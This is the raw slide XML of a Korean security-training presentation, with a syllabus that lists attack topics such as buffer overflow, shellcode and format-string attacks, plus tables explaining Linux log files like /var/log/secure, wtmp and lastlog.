                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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계정과 패스워드 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세션 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접근제어</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권한관리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로그관리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취약점관리</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401509186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계정과 패스워드 관리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13085" y="2125526"/>
            <a:ext cx="6467412" cy="2834035"/>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계정과 패스워드 관리</a:t>
            </a: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적절한 권한을 가진 사용자를 식별하기 위한</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가장 기본적인 인증 수단</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRP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신분증 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 공문서 같은 역할을 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3933810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9" name="표 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD44F7C-4518-4A11-9E00-574F251C6A55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1963954653"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492578" y="262075"/>
          <a:ext cx="5728608" cy="6452629"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="875600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4082926486"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1081096">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2834295377"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2827815">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="316545484"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="944097">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1453330335"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="194361">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345408255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1</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40000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>정보보호 개요</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OT(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>교관 및 강의계획 소개</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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사이버전 실습체계 개요</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5312411"/>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2</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고전암호 크래킹</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카이사르 암호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치환암호</a:t>
                      </a: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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 암호</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75</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기 졸업</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[3.12.(</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920528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3</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및 최적화</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실습 및 최적화 방법 소개</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4815727"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="994322">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4</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 개념 및 운영체제 종류</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윈도우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맥</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유닉스</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시스템 명령어</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alias, keyword, function, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>내부 명령어</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명령어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0388763"/>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5</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실습 도구</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vi </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>편집기</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wireshark</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objdump</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gdb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, python</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3326298"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="994322">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="-80">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>6</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파일 시스템 및 시스템 보안로그</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ext</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시스템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변조 및 감지</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사용자 계정 관리</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사용자 계정 확인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등록</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삭제</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패스워드 인증</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032605"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1173731">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7</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보안관리 및 침해상황 대비</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권한 변조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서비스 보안 강화 설정</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점검</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, R-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>명령어 제한</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접속 탐지 및 보안</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계정 원격 접속 및 우회 접속 탐지</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방화벽 설정</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6977292"/>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8</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[4. 19.(</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23.(</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a:solidFill>
                          <a:srgbClr val="0000FF"/>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4235184"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="516484">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9</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버퍼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메모리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복귀 주소 조작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홍보출장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>차</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4.28.(</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수업후</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4.30.(</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7601621"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="표 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A4BF7D-D114-439F-A8AE-DE6E89910F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4101388723"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6302284" y="262074"/>
          <a:ext cx="5397137" cy="5653856"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="824905">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1299382196"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1018495">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1978101040"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2664226">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3551419966"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="889511">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1336580900"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="253320">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1501439883"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="964316">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="10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쉘코드</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어린이날</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 5.(</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>옥포제</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[5.6.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>목</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7723318"/>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힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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b="1" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0000FF"/>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석가탄신일</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[5.19.(</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18132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포맷스트링 공격 및 대응</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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2153514"/>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레이스 컨디션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130</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기</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OCS</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[5.28.(</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9320557"/>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백도어</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2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34851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[6.7(</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11.(</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118811" marR="118811" marT="59406" marB="594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4262386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B301229-7DA4-459A-9C2C-64C3815420E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1683A04-F8CC-4B8A-8DA9-94469BE15BE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2E028E5-24EC-48F8-AF96-591B7A11C3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B5C20FE1-DC34-4AD6-9A7E-4D4E70AF52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67914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/Theory/T7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로그</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0" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8627C853-C6BF-4E42-A4C6-6EF4162B36C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3273746377"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1737342" y="1822744"/>
          <a:ext cx="8520894" cy="4087552"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1877869">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6643025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4095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 위치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/var/log/secure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 telnet, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>ssh</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접속에 대한 유저 로그인 인증 기록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dmesg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부팅시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 시스템에 의해 기록되는 로그</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/var/log/message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syslog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>에 의한 로그인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설정</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장치 정보의 전체적인 로그를 기록합니다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815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/var/run/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>utmp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lvl="0" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buChar char="-"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>현재 시스템에 로그인한 각 사용자의 상태를 저장하는 파일 바이너리 파일로 되어 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="020306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w,who,users,finger</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 등으로 내용을 볼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15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wtmp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로그인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로그아웃</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시스템의 재부팅에 대한 정보가 담겨있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>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파일로 되어 있으며 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>last </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>명령어로 내용을 확인 할 수 있습니다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409558">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lastlog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계정사용자들이 마지막으로 로그인한 정보</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파일로 되어 있으며 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>lastlog</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명령어로 확인 할 수 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9529497"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="409558">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/var/log/boot.log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부팅시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 서비스 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>데몬들의</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 실행 상태를 기록하는 로그이다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8713605"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143051649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/Theory/T7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로그</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0" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8627C853-C6BF-4E42-A4C6-6EF4162B36C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3381118039"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1737342" y="1822745"/>
          <a:ext cx="8520894" cy="4487219"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1877869">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6643025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334165">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 위치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497974">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cron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cron</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>에 예약한 작업이 정상적으로 실행되었는지에 관한 로그를 기록한 파일</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995947">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xferlog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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>FTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>서버의 데이터 전송에 관련된 로그 기록입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>.</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파일의 송수신모드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(a:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
